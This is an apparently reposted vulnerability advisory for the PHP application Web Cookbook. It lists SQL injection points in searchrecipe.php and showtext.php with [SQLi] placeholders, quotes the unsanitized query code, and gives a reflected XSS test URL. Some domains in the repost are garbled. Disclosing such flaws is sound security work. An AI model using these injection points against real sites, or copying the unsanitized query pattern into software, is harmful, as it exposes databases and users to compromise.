标题: Web Cookbook Multiple SQL Injection 作者: Saadat Ullah , saadi_linux@rocketmail测试数据 下载 地址: http://sourceforge.net/projects/webcookbook/ 主页: http://security-geeks.blogspot测试数据/ 测试系统: Server: Apache/2.2.15 (Centos) PHP /5.3.3 # SQL 注射 http://localhost/cook/searchrecipe.php?sstring=[SQLi] http://HdhCmsTest2cto测试数据 /cook/showtext.php?mode=[SQLi] http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient= http://localhost/cook/showtext.php?mode=[SQLi] #Proof Of Concept In showtext.php Code: $mode = $_GET["mode"]; . . showText($mode, $art);//sending $mode to a function without sanitizing it . . function showText($kategorie, $art) { initDB(); echo "<div class=\"rdisplay\">\n"; $query = "SELECT * FROM dat_texte WHERE id = $kategorie"; //using a non sanitize field in the querry $result = mysql _query($query); . . All GET Fields Are Vuln To SQLi http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient= #p0c In searchrecipe.php $title = $_GET['title']; $prefix = $_GET['prefix']; $preparation = $_GET['preparation']; $postfix = $_GET['postfix']; $tipp = $_GET['tipp']; $ingredient = $_GET['ingredient']; . . . if ($title != "") { $sstring = "a.title LIKE '%$title%' "; } . . searchRecipe($mode, $sstring); . . In Function SearchRecipe $query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title"; http://localhost/cook/searchrecipe.php?sstring=[SQLi] 测试利用: $sstring = $_GET['sstring']; if ($sstring != "") { searchRecipe(0, $sstring); . . . $query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title"; 一个简单的非持久 XSS http://HdhCmsTest2cto测试数据 /cook/searchrecipe.php?mode=1&title=<script>alert('hi');</script>&prefix=&preparation=&postfix=&tipp=&ingredient= #Independent Pakistani Security Researcher
查看更多关于Web Cookbook多个SQL注射 - 网站安全 - 自学php的详细内容...